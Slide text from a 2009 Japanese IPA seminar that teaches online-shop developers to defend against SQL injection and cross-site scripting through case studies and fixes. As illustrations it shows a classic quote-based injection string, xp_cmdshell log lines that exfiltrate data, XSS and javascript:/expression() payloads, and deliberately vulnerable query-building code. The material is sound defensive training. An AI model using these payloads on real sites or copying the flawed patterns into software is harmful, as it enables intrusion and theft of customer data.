60 4.4 安全なウェブサイト運営入門 プレイヤーが主人公として 7 つのセキュリティ事故を体験し対応する 主人公がインターネットショッピングサイト責任者に! ショッピングサイト運営中の主人公に お客様からの問合せ殺到 インシデント発生! 問題の対策をプレイヤーが選択 Copyright 2009 独立行政法人情報処理推進機構 7 つのインシデント 1. 電子メールの誤送信 2. クロスサイト スクリプティング結果でシナリオが変化 会社の経営に影響も 3. SSLサーバ証明書の! 結果の積重ねでサイトの評判に影響し売上にも影響 引いては会社の経営にも影響 期限切れ最悪会社が危機的状況に! 上手く行けば事業拡大 分社化しプレイヤーが本部長に 4. ウイルス感染 5. サービス運用妨害 非技術者でも分かり易いよう心掛けた内容や言葉遣い 6. セッション管理の不備難しい専門用語にはルビで説明 7. SQLインジェクション 各章の終わりで 寄り道として補足コンテンツが有り 話を振り返り正しい対策論 その脅威の数字的なダメージなどを学ぶ事も可能 ネット通販セキュリティ対策セミナー 60

61 4.4 安全なウェブサイト運営入門 ニュースサイト記事やブログで評判 メディアや体験者からの評判は良好! 記事 : INTERNET Watch Security NEXT ZDNet Japan Itmedia レビュー : Slashdot EnterpriseZine CodeZine RBB TODAY マイコミジャーナル セキュリティやWebサイト運営の基礎的な内容から解説されているそうなので 入門用教材として良いかと思われます ( 出典 :Slashdot ) 選択肢についてはさほど難しく感じることは少なかった しかし 実際に 自らの運営するWebサイトにセキュリティ事件が発生した場合 このような冷静な判断ができるであろうか? ( 中略 ) 本ソフトでは あえて 正しくない 選択をした場合にどのような結末を迎えるのか それを読むのも有意義であると思う ( 中略 ) 本ソフトの最後に 商品と同様に安全を売るショップということでも注目を集めた という台詞がある これこそがネットショップに 今 求められるものではないだろうか ( 出典 : マイコミジャーナル ) ブログ :30 以上ものブログで評価 このようなゲーム感覚でセキュリティについて学ぶというのは より実践的な経験を積むことができるので セキュリティ教育にはとてもよい教材だと思いますグッド! できれば 小学校 中学校 そして高校の授業でこのソフトを用いたセキュリティ教育をしていただきたいものです ( 出典 : 情報セキュリティ学院 ) Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 61

62 4.4 安全なウェブサイト運営入門 社内教育や大学授業 イベントでの利用も 社内教育 : コンサルティング会社 他大学授業 : A 大学イベントでのセキュリティ啓蒙 : 地域 ict 未来フェスタ2008inとくしまメーリングリスト : N 地域地場産業振興センター Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 62

63 4.4 安全なウェブサイト運営入門 ダウンロード 安全なウェブサイト運営入門 -7 つの事件を体験し ウェブサイトを守り抜け!- アンケート協力のお願い 本日配布したCD-ROM 内に 安全なウェブサイト運営入門 が入っておりますので 是非 ご利用頂きたく思います 今後の普及啓発ツール 資料等の作成に活用させていただくため 同封のアンケートにご協力頂き 記載の電話番号に FAX をお願い致します Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 63

64 セキュリティセンター (IPA/ISEC) 情報セキュリティ関連相談窓口 : TEL 03(5978)7509 ( 平日 10:00-12:00 13:30-17:00) FAX 03(5978) virus@ipa.go.jp ( ウイルス関連 ) crack@ipa.go.jp ( 不正アクセス関連 ) winny119@ipa.go.jp (Winny 関連 ) isec-info@ipa.go.jp ( その他セキュリティ全般 ) Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 64

65 ネット通販セキュリティ対策セミナー ネット通販サイト開発者向け具体的対策 ~ デモを交えウェブアプリケーション開発時の対策など ~ 独立行政法人情報処理推進機構セキュリティセンター Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー

66 本コースについて 対象 インターネット通販事業者のウェブサイト運営者 運営委託 代行者 開発者の方々 ポイント ショッピングサイトにおけるセキュリティ事故について デモとケーススタディから脅威と対策の技術的側面を紹介 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 2

67 本コースの内容 ケーススタディ 1.SQLインジェクション 2. クロスサイト スクリプティング Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 3

68 ケーススタディ 1 SQL インジェクション 企業サイトがウイルス感染の加害者に ~ 脆弱性の脅威と技術的解決を学ぶ ~ Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー

69 ケーススタディ 1 SQL インジェクション 1.1 SQLインジェクションとは 1.2 事例 : ショッピングサイトでウイルス感染? 1.3 SQLインジェクション対策のポイント 1.4 SQLインジェクション対策 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 5

70 1.1 SQL インジェクションとは 対象 データベースをバックエンドで利用しているウェブアプリケーション 原因 データベースへの命令の組み立て方に問題 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 6

71 1.1 SQL インジェクションとは ( 続き ) 生じうる脅威 データベースを直接操作されてしまう 秘密情報 個人情報等の漏えい 重要情報の改ざん 破壊 ウェブサイト上にウイルスを埋め込まれる 任意のコード コマンドを実行される 別のサーバを攻撃する踏み台となる Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 7

72 SQL インジェクションとは Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 8

73 1.2 事例 : ショッピングサイトでウイルス感染? About Search Login S h o p p i n g S i t e ショッピングサイト C 社 社員数 200 名 Windows のショッピングカートシステムを使った中規模ショッピングサイト 会員数 10 万人程度 リピーターがついており アクセスは盛況 最新パッチの適用 ユーザ管理 アクセス制限と 一通りは対策 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 9

74 ショッピングサイトの裏側 img img ul li li li About Search Login div お知らせ I S h o p p i n g S i t e img ショッピングカートシステムを自社開発 ウェブのコンテンツは DB に格納されており アクセスを受けるとショッピングカートシステムが動的にページを作成する 販売担当者はショッピングカートシステムの管理画面から 自分の担当する商品情報を更新する サーバ群の管理のために 管理者が数名 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 10

75 ショッピングサイト上にウイルス About Search Login S h o p p i n g S i t e ある日突然 C 社に ウェブを見たらウイルス対策ソフトが反応した ウェブサイトでウイルスに感染した という苦情が複数よせられる ショッピングサイトにはユーザがページ内容を変更したり ファイルをアップロードするような機能はない 一体どこから? Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 11

76 現在の状態を調査する 外部に表示するウェブサイトをメンテナンス用サーバに切り替え 切り離したサイトを調査 トップページに 悪意あるスクリプトを読みこませる内容を追加し ウイルスに感染させようとしていた 他のページには同様の埋めこみは発見できず <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang= ja > 外部のスクリプトを読みこんで実行 <head> <title>welcome to C shopping site</title> <link rel="stylesheet" href="style.css" TYPE="text/css"> <script src= ></script> </head> トップページに埋めこまれた HTML Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 12

77 ウイルスの正体は? 幸い 最新のアンチウイルスソフトを使うとウイルスを検知できた 感染のために ウェブブラウザの複数の脆弱性が使われている ページを見るだけで感染する悪質なもの 感染すると マシンに潜み キーロガー等の機能でパスワードやカード番号を盗みだす アクセスログを見ると 数千人がダウンロードしてしまった可能性がある Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 13

78 参考 : 最近のウイルスの動作 罠ウェブ経由 / 普通のウェブ経由で感染 ブラウザやプラグインの複数の脆弱性をついて侵入を試みる 最初は小さくて流用しやすいプログラム ( ダウンローダ ) に感染させる 実際の攻撃は別サイトからダウンロードしたコード ( プログラムそのもの ) が行う 何がダウンロードされるかわからない = 対策パッチをあてても そのパッチを掻い潜る次の攻撃手法が使われる ダウンロードや命令には 会社が制限できない内部 外部の HTTP/HTTPS を利用し 正規の通信に見せかける 参考 : 近年の標的型攻撃に関する調査研究 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 14

79 まずは感染経路を特定する どうやってウェブサイトにウイルスが仕組まれたのか? 想定 1: サーバへの攻撃? サーバに侵入され改ざん 想定 2: 内部犯行? 想定 3: ウェブサイト経由? ショッピングカートシステムの脆弱性 詳細な調査が必要 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 15

80 想定 1: サーバへの攻撃? 外部からの攻撃による改ざんを疑う 外部に公開しているのはウェブ用とメール用のサーバのみ DB は非公開 外部からはアクセス制限により メール (port 25) と ウェブ (port 80/443) しかアクセスできない ソフトウェアは随時アップデートしており 既知の脆弱性の問題はない ウェブサーバ メールサーバ サーバへの攻撃? ( 想定 1) 攻撃されたとすれば未知の脆弱性 他をまず調査するべき DB サーバ Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 16

81 想定 2: 内部犯行? 内部の人による書き換えを疑う マシンに直接ログインできるのは管理者数人のみ 商品の担当はショッピングカートシステムにログインして 担当個所を編集できるだけの権限しか持たない トップページは無理 クロスチェックしたが システムのログイン記録と ショッピングカートシステムのログには トップページの改ざんの記録や不自然なログの欠損は無かった 内部からの可能性は薄そう インターネット ウェブサーバ 内部犯行? ( 想定 2) DB サーバ 内部ユーザ Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 17

82 想定 3: ウェブサイト経由? ウェブサーバのログを見ていくと エラーログの中に不審な文字列 一見して SQL 文のように見えるが エラー データベースにも同じようなログが エラー表示は消しているので SQL インジェクションではないはず ウェブサーバ ウェブサイト経由? ( 想定 3) DB サーバ /shop/cart/?no=... %20SELECT%20... %20FROM%20... %20WHE RE%20... %20HAVING%20... (...) /shop/cart/?no=... %20SELECT%20... %20FROM%20... %20WHE RE%20... %20ORDER%20... ウェブサーバのエラーログ Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 18

83 SQL インジェクションの可能性あり 詳しく調べた所 データベースのログに 定型外の データの内容を更新する SQL 文が記録されていた UPDATE pages SET "created_at" = ' :19:46', "template" = 'toppage.tmpl', "verified" = 1, "role" = NULL, "published" = 0, contents= <html><head>... データベースのログ これは ショッピングカートシステムで使うデータベース内容を直接書換える SQL 文と判明 ショッピングカートシステムのログに残らない形でトップページを改ざん 悪意あるスクリプトを読みこませる内容を書きこんでいた Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 19

84 ウェブの改ざんだけではなかった データベースのログを更に確認... EXECUTE xp_cmdshell echo ( SELECT... FROM... ) EXECUTE xp_cmdshell echo ( SELECT... FROM... )... データベースのログ 順番通りに実行すると データベースの内容を元に その内容を OS のコマンドで送信するという内容 ウェブの改ざんの裏で 情報漏えいも起きた可能性があった しかし デフォルトで利用できない機能のため問題なし Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 20

85 運営者としての対応 S h o p p i n g S i t e Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 21 About 重要なお知らせ 弊社ウェブサイトにおけるウイルス掲載の問題について XXXX/XX~XX/XX の間アクセスされたお客様へ 他にあやしいものが無いか サーバやデータベースの内容を全面的にチェック ショッピングカートシステムを使わずに おわびと経緯の解説文章をウェブページに 駆除方法の提供 ショッピングカートシステムを修正 本来のウェブページは ショッピングカートシステムが修正された後に公開 ウェブの営業停止による金銭的被害 多層防御の一環として ウェブアプリケーションファイアウォール (WAF) やサーバ用のアンチウイルス製品を導入 参考 : 企業における情報セキュリティ事象被害額調査

86 何が起こっていたのか [HTTP でのアクセス ] /shop/cart/?no=... %20SELECT%20.. 悪意ある攻撃者 ウェブアプリケーション About Search Login [SQLでのアクセス] SELECT... FROM... WHERE... データベース S h o p p i n g S i t e ウェブサイトに SQL インジェクションの脆弱性があり そこを攻撃された SQL インジェクションにより ショッピングカートシステムのログに残らない形で ウェブページを改ざんされた さらに OS コマンドが実行されて情報漏えいを起こされる可能性があった Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 22

87 問題のポイント 自社開発ショッピングカートシステムに未知の脆弱性があり 自社ウェブサイト経由で 外部からのSQL 文の挿入 およびデータベースの改ざんが可能であった SQL 文を構築する際のコーディング上の問題 参考 : 脆弱性関連情報を発見してしまった場合は 脆弱性関連情報に関する届出について Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 23

88 1.3 SQL インジェクション対策のポイント ウェブアプリケーションで修正の必要がある データベースの主要 4 機能 (CRUD) を制御される 脅威は情報漏えいに限らない Create( 作成 ): 偽データの追加の脅威 Read ( 読込 ): データの漏えいの脅威 Update( 更新 ): 偽データでの上書きの脅威 Delete( 削除 ): データの削除の脅威 他の脆弱性を利用するための前準備にも使われる Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 24

89 なぜ SQL 文の挿入が可能か? 特別な意味を持つ記号文字の扱いが不適切 例 : ( シングルクォート ): テキスト文字の引用符 SELECT * FROM a WHERE id='$p'; $p=foo の場合 : SELECT * FROM a WHERE id='foo'; '; $p=foo' or 'a'='a の場合 : SELECT * FROM a WHERE id='foo' or 'a'='a';'; 変数中の記号文字が意味のある文字として解釈される Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 25

90 1.4 SQL インジェクション対策 根本的解決 エスケープ処理 バインド機構の利用 バインド機構以外でのエスケープ エスケープ以前の問題 保険的対策 エラーメッセージの非表示 データベースアカウントの権限見直し その他の対策 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 26

91 根本的解決と保険的対策 根本的解決 脆弱性の原因を作らない実装 を実現 その脆弱性による攻撃を完全に無効化 可能な限り 根本的解決を行うのが望ましい 保険的対策 攻撃による影響を低減する セーフティネット 脆弱性の原因は依然として残る 保険的対策のみに頼る取組は望ましくない Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 27

92 エスケープ処理 ( 根本的解決 ) エスケープ処理の実施 特別な意味を持つ記号文字が普通の文字として解釈されるように処理する 例 :' ''( 同じ文字の繰り返し ) $p=foo' or 'a'='a の場合 : SELECT * FROM a WHERE id='foo'' or ''a''=''a'; 変数中の '( シングルクォート ) が 普通の文字として解釈される Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 28

93 エスケープ処理の方法 大きくわけて次の 2 種類 バインド機構の利用 ( プレースホルダ バインド変数 準備された文 (Prepared Statement)) バインド機構以外でのエスケープ エスケープ関数 (Perl の DBI quote() や PHP の dbx_escape_string()) 置き換え演算子等で自己エスケープ処理 ( s/'/''/g; など ) Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 29

94 エスケープ処理の実装例 バインド機構を利用 ( 例 : Perl DBI) 独自の処理でエスケープ処理をする必要が無くなる $sth = $dbh->prepare( "SELECT id, name, tel, address, mail FROM usr WHERE uid=? AND passwd=?"); $sth->execute($uid, $passwd); バインド変数 プレースホルダ 参考 : セキュア DB プログラミング バインドメカニズムを活用しよう Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 30

95 エスケープ処理の失敗例 SQL 文の組み立てにパラメータ値をそのまま利用 $sql="select id, name, tel, address, mail FROM user WHERE uid='".$uid."'and passwd='".$passwd."'"; $sth=$dbh->prepare("$sql"); $sth->execute(); 正しく利用せず prepare 内で組み立ててもだめ $sth=$dbh->prepare( "SELECT id, name, tel, address, mail FROM user WHERE uid='$uid'and passwd='$passwd'"); $sth->execute(); Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 31

96 エスケープ処理以前の問題 ( 根本的解決 ) 外部から SQL 文を直接入力する <html> <form> <input type="hidden" value="select * FROM..."> </form> 論外 であり 避けるべき実装である Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 32

97 エラーメッセージを表示すると 名前 : 悪人太郎 SQL error with query SELECT a.name, a.displname, a.passwd, a.expire_date, a.create_date, a.misc FROM account as a WHERE a.category=7 ORDER BY c.date: Can't open file: account.myd'. (errno: 145) 趣味 : クラッキング 攻撃者の視点では こう見える データベースを利用 SQL インジェクションの可能性 SQL エラーに気を使っていない 攻略の可能性 エラー内容に SQL 文が含まれる レコード定義が推測できる & 試行錯誤すればどんどん調査できる可能性 エラー内容から攻略方法を検討 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 33

98 エラーメッセージを非表示にする ( 保険的対策 ) ウェブアプリケーションで対応 アプリケーションでエラーメッセージ表示処理を用意して それを呼び出す データベースの設定で対応 設定で変更 ウェブサーバの設定で対応 設定でエラー時の応答を設定 エラーを表示するとしても 内容は最小限に エラーを消すだけでは解決しない ツールでまとめてやられれば一緒 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 34

99 エラーメッセージを非表示にする ( 保険的対策 ) ウェブサーバでの設定例 Microsoft IIS 6 デフォルト値は クライアントに詳細な ASP のエラーメッセージを送る なので注意! この設定で ASP のエラーは全て置き換えられる Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 35

100 エラーメッセージを非表示にする ( 保険的対策 ) ウェブサーバでの設定例 PHP 5 (php.ini などで ) display_errors=off : エラーをHTMLとして画面出力するか display_startup_errors=off ; PHPの初期動作時点で起きるエラーを HTMLとして画面出力するか他 error_reporting ; エラーの表示内容を設定 log_errors ; ログにエラー出力を行うか設定 エラーを表示しないだけでは駄目で エラーの内容を選別して ログに記録するようにしておく必要がある Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 36

101 データベースの権限は制限する ( 保険的対策 ) 権限全部入り のアカウントは使わない sa (System Administrator) dba (Database Administrator) データベース毎に専用のアカウントを作り 権限を制限して使う 既存のテーブルを読み書きするだけなのに テーブル操作や管理等の権限はいらない 権限を必要最小限にすれば 防げる攻撃もある Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 37

102 その他の対策 ( 保険的対策 ) 収集する情報を見直す 必要最小限の情報しか格納しない DB に格納する情報を見直す 内部で保持しておけば済む情報もあるのでは パスワードはそのまま保存しない ハッシュ値を保存する ilogscanner の利用 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 38

103 まとめ :SQL インジェクションの被害 システム上で起きること ウェブサイトのサーバ上で 悪意ある SQL 文が実行される ウェブサイトのサーバ上で 悪意ある OS コマンドが実行される その結果として起きる可能性があること ウェブサイトへのウイルスの埋め込み 顧客情報など 秘密情報の漏えい 必要になる対応 緊急対応 顧客への謝罪 補償 ウイルス対策案内 システムの改修 再検査 信用の回復 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 39

104 まとめ :SQL インジェクションの対策 SQL 文の組み立てには必ずエスケープ処理を実装する 公開ページでは エラーメッセージをそのままブラウザに表示しない Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 40

105 ケーススタディ 2 クロスサイト スクリプティングによる フィッシング詐欺 認証画面 にスクリプト混入? ~ 漏れが生じやすい対策に注意 ~ Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー

106 ケーススタディ 2 クロスサイト スクリプティング 2.1 事例 : クロスサイト スクリプティング 2.2 スクリプトを埋め込まれやすいウェブアプリケーションについて 2.3 クロスサイト スクリプティング対策 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 42

107 2.1 事例 : クロスサイト スクリプティング ショッピングサイト H 販売 中規模ショッピングサイト 最強のセキュリティ対策と自負 サーバの堅牢化 アクセス制御 通信は HTTPS で暗号化 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 43

108 フィッシング詐欺疑惑 サイト利用者より H 販売に問い合わせ 心当たりの無いクレジットカードの請求がきた 請求元はH 販売だが 購入した記憶なし サイトの登録情報が変更されていた フィッシング詐欺には注意していたつもりだが H 販売の対応 調査するので 詳細の情報を教えて欲しい Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 44

109 フィッシング詐欺とは 利用者から入力された重要情報を入手する 本物のウェブサイト 偽のウェブサイト 利用者 偽のウェブサイトを本物のウェブサイトと思い込み 認証情報やクレジットカード番号を入力してしまう 悪意のある人 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 45

110 フィッシング詐欺の様々な手口 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 46

111 H 販売 ( を装った ) メール 送信者 : H 販売 <info@h.example.com> 32 inch 液晶 TV : 100,000 i?id=24c8ad774fa45222&sid=%e3% 82%BB%E3%82%AD%E3%83%A5%E3%83% AA%E3%83%86%E3%82%A3javascript :...%E3%82%BB%E3%82%AD%E3%83%A 5%E3%83%AA%E3%83%86%E3%82%A3 利用者の行動 メールアドレスのチェック 商品 URLのドメインチェック ブラウザも最新問題なし 実際にアクセス Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 47

112 メールからサイトへアクセス アクセス後のページ xxxxxxxxxx ユーザ ID パスワード ログイン 利用者の心理 URL のドメイン サーバ証明書は H 販売のもの 安心してログインできる URL 問題なし 暗号化されている 証明書の警告も出ない Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 48

113 ログイン画面に埋め込まれたスクリプト アクセス後のページ xxxxxxxxxx ユーザID パスワードログイン <html>... <form> <input type="text"... <input type="password" <script>form.action=...;</script>... スクリプトの有無はページの外観ではわからない ログインすると 認証情報が外部へ送信される 実はスクリプトが埋め込まれていた Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 49

114 クロスサイト スクリプティングとは HTML ページを出力する処理実装の問題 例 :print "<h1>$title</h1>"; 文字列 ($title) を出力する際 テキスト として出力することを想定しているにもかかわらず その実現に必要な処理 ( エスケープ処理 ) を実装していない 例 :< < > > & & など テキスト として出力することを想定した箇所に HTML タグ として出力することができてしまうことにより セキュリティ上の問題となる Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 50

115 クロスサイト スクリプティングとは ( 続き ) 利用者 利用者 検索キーワード 1 3 IPA を含む検索結果 検索キーワード <s>ipa</s> 3 IPA を含む検索結果 IPA ウェブサーバ 1 <s> は 取り消し線を引く HTML タグ ウェブサーバ <html> IPA IPA を含む検索結果 </html> <html> <s>ipa</s> を含む検索結果 </html> "<" および ">" が出力され HTMLタグとして認識されてしまう ( 表示が崩れる ) Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー

116 クロスサイト スクリプティングとは ( 続き ) 攻撃イメージ Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 52

117 SQL インジェクションとの違い SQL インジェクションは 能動的攻撃 攻撃者は 標的 ( 主にウェブサイト ) に対し 直接攻撃を行うことが可能 直接攻撃 攻撃成立 攻撃者 ウェブサイト クロスサイトスクリプティングは 受動的攻撃 ( 誘導型攻撃 ) 攻撃者は 標的 ( ウェブサイト利用者 ) に直接攻撃を行うことはできない 攻撃者は罠を用意し 標的がその罠を踏むように誘導する 攻撃のタイミングは 標的がアクションを起こした時 見方を変えれば 利用者が自分自身を攻撃 している 攻撃者 誘導 攻撃成立利用者 ウェブサイト Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 53

118 スクリプトを埋め込まれた結果 Cookie が盗まれる セッション ID などの情報が盗まれる 場合によってはユーザ名やパスワードが盗まれることも ページに偽情報が表示される 商品の価格など 目に見える情報 パスワード送信先など 目に見えない情報 全面的に偽のページが表示されることも Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 54

119 2.2 スクリプトを埋め込まれやすいウェブアプリケーションについて 入力値を遷移後の画面で利用 その際 エスケープ処理を行っていない 想定の入力値であれば xxxxxxxxxx xxxxxxxxxx xxxxxxxxxxxx xxxxxxxxxxxx xxxxxxxxxxxx xxxxxxxxxxxx xxxxxxxxxxxx xxxxxxxxxxxx 確認 戻る 登録 情報を入力すると 入力した内容が表示される 例 : 入力内容の確認画面例 : 掲示板など Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 55

120 2.2 スクリプトを埋め込まれやすいウェブアプリケーションについて ( 続き ) 入力値に細工した文字列を指定 ><script>alert( test );</script> xxxxxxxxxx xxxxxxxxxx xxxxxxxxxxxx xxxxxxxxxxxx xxxxxxxxxxxx 登録 指定されたスクリプトがブラウザ上で実行される スクリプトの内容は攻撃者次第 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 56

121 ウェブサイト全てに対策が必要 問題箇所は入力フォームだけとは限らない XSS の問題がウェブサイトのどこかに一つでも残っていると その箇所を狙われてしまう ページを全面的に偽のページとして表示される攻撃があり フィッシング詐欺に悪用される ドメインが同じであるため 利用者が罠と気付きにくく 被害に遭いやすい Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 57

122 2.3 クロスサイト スクリプティング対策 HTML テキストの入力を許可しない場合 根本的解決 エスケープ処理 URL 出力時のスキーム確認 スクリプトを動的に生成しない スタイルシートを動的に生成しない 保険的対策 入力値チェック Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 58

123 2.3 クロスサイト スクリプティング対策 ( 続き ) HTML テキストの入力を許可する場合 根本的解決 構文解析木を作成して 必要な要素のみを抽出 保険的対策 共通 入力された HTML テキストから スクリプトを除く 根本的解決 文字コードの指定を行う Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 59

124 エスケープ処理 (HTML 不許可 / 根本的解決 ) 記号文字 を置換 (HTML を許可しない場合 ) 例 : & & " " < < > > ' &#039; 入力値 :<script>alert("test");</script> 置換後 : <script>alert("test");</script> Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 60

125 URL 出力時のスキーム確認 (HTML 不許可 / 根本的解決 ) URL の中に埋め込まれる場合 URL の入力を許可している場合 URL の形でスクリプトを埋め込まれることがある 例 : javascript:alert('ipa'); 利用者にリンクの入力を許している場合は 要注意 URL 出力時は と のみを許可 data: や javascript: などのスキームを防ぐ ブラックリスト方式では漏れてしまう Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 61

126 スクリプトを動的に生成しない (HTML 不許可 / 根本的解決 ) スクリプトそれ自体を 外部からの入力に基づいて動的に生成しない 例 : <script>~</script> の内容 <script src="~"> の参照先 危険なスクリプトを検出して排除する方法も考えられるが 確実な判断は難しい Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 62

127 スタイルシートを動的に生成しない (HTML 不許可 / 根本的解決 ) スタイルシート内での expression() などによるスクリプト埋め込みを防ぐ スタイルシートの入力を許可している場合 その中にスクリプトを埋め込まれることがある 例 : width: expression(alert('xss')); 利用者にスタイルシートの入力を許している場合は 要注意 危険なスクリプトを検出して排除する方法も考えられるが 確実な判断は難しい Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 63

128 入力値チェック 失敗例 (HTML 不許可 / 保険的対策 ) script は許可しない! 氏 + 名 入力値 入力値チェック 入力値 入力値処理 処理済み入力値 スクリプト出力処理実行 氏 :scr: 情報名 :ipt: 太郎 チェック通過 氏名 :script : 情報太郎 チェック通過後の処理によって危険な文字が生成 チェックに漏れが生じている可能性も Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 64

129 入力値チェック (HTML 不許可 / 保険的対策 ) チェックのタイミングを意識する 出力時の値に注目 入力値 入力値チェック 入力値 入力値処理 処理済み入力値 出力処理 出力対象に注目! スクリプトを形成するかどうかは出力値次第 入力値のチェックは必要に応じて実施 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 65

130 構文木を作成する (HTML 許可 / 根本的解決 ) 例 html head body title table p script meta thead a link tbody font 複雑な処理であり 十分な検討が必要 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 66

131 入力値チェック (HTML 許可 / 保険的対策 ) スクリプトを無害な文字列に置換する <script> <xscript> javascript: xjavascript: 完全な対策は困難 java script: java( 改行コード )script: Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 67

132 文字コード指定を行う ( 共通 / 根本的解決 ) ウェブブラウザが ウェブサイトの意図と反する文字コード解釈をする場合があり ウェブサイト側での対策の効果がなくなる Content-Type: ヘッダでの指定 Content-Type: text/html; charset=euc-jp meta タグでの指定方法 <meta http-equiv="content-type" content="text/html; charset=euc-jp"> Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 68

133 包括的なクロスサイト スクリプティング対策 ウェブサイト全体に対策を行き届かせたい でもどうすれば? テンプレートエンジンを利用する方法がある 例 : Struts(Java), Smarty(PHP), Ruby on Rails テンプレートエンジンの内容を よく把握して使う必要がある 漏れが起きる可能性を少なくする設計ができる Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 69

134 まとめ : クロスサイト スクリプティング ウェブページを出力する際の配慮を怠ると クロスサイト スクリプティングの脆弱性が生じる 全ての個所に対して 対策を施す必要がある 詳しくは 安全なウェブサイトの作り方 を参照 安全なウェブサイトの作り方改訂第 3 版 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 70

135 安全なウェブ開発のための資料 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー

136 他の脆弱性への対策も重要 クロスサイト スクリプティングや OS コマンドインジェクションに代表される脆弱性 SQL インジェクションと同様に 設計時からの対策で防げるものが多い 実施する対策の効果や性質を正しく理解する 安全なプログラミング知識を身に付ける Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 72

